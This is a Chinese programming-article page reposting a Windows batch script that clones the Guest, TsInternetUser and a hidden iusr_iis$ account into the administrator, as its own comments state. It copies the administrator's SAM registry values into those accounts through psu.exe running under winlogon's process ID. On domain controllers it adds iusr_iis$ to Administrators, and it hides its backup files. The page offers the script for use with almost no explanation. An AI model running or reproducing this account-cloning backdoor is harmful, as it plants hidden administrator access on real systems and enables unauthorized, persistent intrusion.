自动克隆guest为administrators组的批处理
程序员文章站
2024-01-15 21:31:40
复制代码 代码如下:@echo guest.bat ^ ^ @echo ...
复制代码 代码如下:
@echo guest.bat ^<zpid^> ^<password^>
@echo __________________________________________________________
@rem 本guest.bat自动克隆guest为administrators组。
@rem 如果存在username表示在终端登陆的环境运行bat.需要手工输入pid值。
@rem 最好先手工修改密码。执行本程序两次。哈哈。 主要是没有掩饰。regedit比较费时间。
@set zpath=%path%
@set zcd=%cd%
@set path=%path%;%windir%;%windir%\system32
:start
@net user guest |find /i "*domain" &&echo domain controller, dont clone. add user! &&goto domain
@if not "%username%"=="" echo username=[%username%],term_login mode. input pid. &&goto term
:start1
@pulist.exe |findstr.exe /i "winlogon.exe" >a
@setx.exe a -f a -a 0,1 >b
@for /f "eol=; tokens=1,2,3* delims=, " %%i in (b) do @set zpid=%%i
@goto auto
:term
@if "%1"=="" goto usage
@if not "%2"=="" net user guest %2
@if not "%2"=="" net user |find /i "tsinternetuser" >nul &&net user tsinternetuser %2
@set zpid=%1
:auto
@echo make admg.reg admt.reg admiis.reg
@psu.exe -p "%windir%\regedit.exe -e admin.reg hkey_local_machine\sam\sam\domains\account\users\000001f4" -i %zpid% >nul
@psu.exe -p "%windir%\regedit.exe -e name.$$$ hkey_local_machine\sam\sam\domains\account\users\names" -i %zpid% >nul
@echo windows registry editor version 5.00 >admg.reg
@echo windows registry editor version 5.00 >admt.reg
@echo [hkey_local_machine\sam\sam\domains\account\users\000001f5]>>admg.reg
@echo [hkey_local_machine\sam\sam\domains\account\users\000003e8]>>admt.reg
@type admin.reg >a &echo "unicode -->>> ansi . find.exe use it ansi." &if exist b del b
@echo "f"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,\>>b
@setx.exe a -f a -a 4,0 |find "," >>b
@setx.exe a -f a -a 5,0 |find "," >>b
@setx.exe a -f a -a 6,0 |find "," >>b
@type b >>admg.reg
@type b >>admt.reg
:iis
@set zda=no
@echo iusr_iis exec
@type name.$$$ >name.reg
@copy name.reg name.txt >nul
@for /l %%i in (5,3,30) do @(setx.exe a -f name.reg -a %%i,0 |find /i "iusr_iis$" &&set zda=%%i)
@if "%zda%" =="no" goto psu
@rep.exe "iusr_iis$" name.txt /r /i >nul
@rep.exe "editor" name.txt /r /i >nul
@find.exe /v /n "" name.txt >n1
@findstr /i "%zda%" n1 >name.iis
@setx a -f name.iis -a 0,1 -d () >zdc
@del n1
@del name.iis
@del name.$$$
@del name.txt
@del a
@del b
@for /f "tokens=1,2* delims= " %%i in (zdc) do @(echo %%i>zdd)
@for /f "tokens=1,2* delims= " %%i in (zdd) do @(set zdd=%%i)
@copy admg.reg admiis.reg >nul
@echo rep.exe "1f5" "%zdd%" admiis.reg /i
@rep.exe "1f5" "%zdd%" admiis.reg /i
@del zdc
@del zdd
:psu
@attrib -s -r admg.bak >nul
@attrib -s -r admt.bak >nul
@copy admg.bak admg.reg >nul
@copy admt.bak admt.reg >nul
@psu.exe -p "%windir%\regedit.exe -s admg.reg" -i %zpid% >nul
@psu.exe -p "%windir%\regedit.exe -s admt.reg" -i %zpid% >nul
@if not "%zda%"=="no" psu.exe -p "%windir%\regedit.exe -s admiis.reg" -i %zpid% >nul
@if not "%zda%"=="no" net user iusr_iis$ /active:yes >nul
@if not "%zda%"=="no" net user iusr_iis$ /active:no >nul
@copy admg.reg admg.bak >nul
@copy admt.reg admt.bak >nul
@attrib admg.bak +r +s >nul
@attrib admt.bak +r +s >nul
@net user guest /active:yes >nul
@net user guest /active:no >nul
@net user |find /i "tsinternetuser" || goto next
@net user tsinternetuser /active:yes >nul
@net user tsinternetuser /active:no >nul
@if exist admin.reg del admin.reg /f >nul
@if exist admg.reg del admg.reg /f >nul
@if exist admt.reg del admt.reg /f >nul
:next
@goto end
:domain
@rem add user iusr_iis$
@if "%2"=="" echo "not input guest of password" &&goto end
@net user |find /i "iusr_iis" >nul ||net user iusr_iis$ %2 /add
@net localgroup administrators |find /i "iusr_iis$" >nul ||net localgroup administrators iusr_iis$ /add
@goto end
:usage
@pulist.exe |findstr.exe /i "winlogon explorer"
@echo " system.bat zpid <password> "
@echo " need cur winlogon pid ,term_mode,must this term_login_winlogon_pid. "
@goto end1
:end
@echo ________all user in administrators :
@net localgroup administrators
:end1
@echo psu.exe -p "%windir%\regedit.exe -s admiis.reg" -i %zpid%
@set path=%zpath%
@set zpath=
@set zcd=
@set zda=
@set zdb=
@set zdd=
@set zpid=
下一篇: flutter实现点击事件